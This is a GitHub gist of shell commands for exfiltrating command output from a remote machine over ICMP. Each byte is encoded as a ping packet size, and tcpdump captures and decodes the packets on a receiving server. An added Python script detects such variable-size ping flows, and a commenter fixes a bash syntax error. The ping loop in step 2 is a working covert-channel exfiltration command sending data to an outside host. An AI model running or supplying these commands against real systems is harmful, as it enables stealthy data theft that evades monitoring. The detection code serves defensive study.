@jobertabma
Last active September 14, 2022 15:02
Commands to exfiltrate command output via ICMP packet size
  1. Capture ICMP echo requests on your server (the filter is quoted so the shell does not treat the brackets as a glob):
tcpdump -nni eth0 -e 'icmp[icmptype] == 8' -w output.cap
  2. Send ICMP packets to your server with each byte stored in the packet size; execute this on the remote machine (the stray `;` after `do` has been removed, since bash rejects `do;`):
ip=vm03;output=`hostname`;for ((i=0;i<${#output};i++));do ping -c 1 -s `printf '%d\n' "'${output:$i:1}'"` $ip;done
  3. Stop the tcpdump started in step 1.
  4. Decode the ICMP packet sizes to reveal the command output (tcpdump's reported length includes the 8-byte ICMP header, hence the `- 8`):
tcpdump -ttttnnr output.cap | awk '{print $NF}' | while read ord; do printf "\\$(printf '%03o' "`expr $ord - 8`")"; done; echo
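The detection-side counterpart of the procedure above, added here as an example and not part of the gist: it parses tcpdump text output of the kind step 4 reads (the sample lines below are constructed, not captured from a real network) and flags echo-request flows whose ICMP lengths change from packet to packet and all sit in the printable-ASCII-plus-8-byte-header range. A stock `ping` sends a constant payload size, so a flow with many distinct sizes in that band is the footprint of this channel. The threshold parameters and their defaults are assumptions chosen for illustration.

```python
import re
from collections import defaultdict

# Constructed sample of tcpdump text output (not a real capture).
# 10.0.0.5 behaves like a normal ping: constant ICMP length 64 (56 + 8).
# 10.0.0.7 varies the length per packet inside the printable-ASCII + 8 band.
SAMPLE_TCPDUMP = """\
2017-07-06 10:00:00.000001 IP 10.0.0.5 > 10.0.0.9: ICMP echo request, id 1, seq 1, length 64
2017-07-06 10:00:01.000001 IP 10.0.0.5 > 10.0.0.9: ICMP echo request, id 1, seq 2, length 64
2017-07-06 10:00:02.000001 IP 10.0.0.5 > 10.0.0.9: ICMP echo request, id 1, seq 3, length 64
2017-07-06 10:00:03.000001 IP 10.0.0.7 > 10.0.0.9: ICMP echo request, id 2, seq 1, length 126
2017-07-06 10:00:03.100001 IP 10.0.0.7 > 10.0.0.9: ICMP echo request, id 3, seq 1, length 117
2017-07-06 10:00:03.200001 IP 10.0.0.7 > 10.0.0.9: ICMP echo request, id 4, seq 1, length 56
2017-07-06 10:00:03.300001 IP 10.0.0.7 > 10.0.0.9: ICMP echo request, id 5, seq 1, length 59
2017-07-06 10:00:03.400001 IP 10.0.0.9 > 10.0.0.7: ICMP echo reply, id 5, seq 1, length 59
"""

# Only echo requests (type 8) carry data outward; replies are ignored.
ICMP_ECHO_RE = re.compile(
    r"IP (?P<src>\S+) > (?P<dst>\S+): ICMP echo request, id \d+, seq \d+, length (?P<length>\d+)"
)

# tcpdump's "length" for ICMP is header + payload; the echo header is 8 bytes.
ICMP_HEADER_LEN = 8
PRINTABLE_MIN, PRINTABLE_MAX = 32, 126


def parse_echo_requests(text):
    """Group ICMP lengths of echo requests by (src, dst) flow."""
    flows = defaultdict(list)
    for line in text.splitlines():
        m = ICMP_ECHO_RE.search(line)
        if m:
            flows[(m["src"], m["dst"])].append(int(m["length"]))
    return flows


def flag_suspicious_flows(text, min_packets=3, max_distinct_normal=1, ascii_ratio=0.8):
    """Return flows whose echo-request sizes vary and track printable ASCII.

    Heuristic (assumed thresholds): a normal ping keeps one size, so more than
    `max_distinct_normal` distinct sizes, with at least `ascii_ratio` of them in
    the [32 + 8, 126 + 8] band, is reported for analyst review.
    """
    findings = []
    for (src, dst), lengths in parse_echo_requests(text).items():
        if len(lengths) < min_packets:
            continue
        distinct = len(set(lengths))
        in_band = sum(
            1 for n in lengths
            if PRINTABLE_MIN + ICMP_HEADER_LEN <= n <= PRINTABLE_MAX + ICMP_HEADER_LEN
        )
        ratio = in_band / len(lengths)
        if distinct > max_distinct_normal and ratio >= ascii_ratio:
            findings.append({
                "src": src,
                "dst": dst,
                "packets": len(lengths),
                "distinct_sizes": distinct,
                "printable_ratio": round(ratio, 2),
            })
    return findings


if __name__ == "__main__":
    for f in flag_suspicious_flows(SAMPLE_TCPDUMP):
        print(f"suspicious ICMP flow {f['src']} -> {f['dst']}: "
              f"{f['packets']} echo requests, {f['distinct_sizes']} distinct sizes, "
              f"printable ratio {f['printable_ratio']}")
```

In practice the input would come from `tcpdump -ttttnnr output.cap` over a capture like the one in step 1; the constant-size flow from 10.0.0.5 is not reported, while the four-packet flow from 10.0.0.7 is. Tuning `min_packets` upward reduces noise from short diagnostic pings, and the same size-variance idea applies to ICMP payload content, which this text-only parser does not inspect.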
@cedriczirtacic
cedriczirtacic commented Jul 6, 2017

`do;` will fail in bash. It's better if you remove that `;` in the 2nd step.
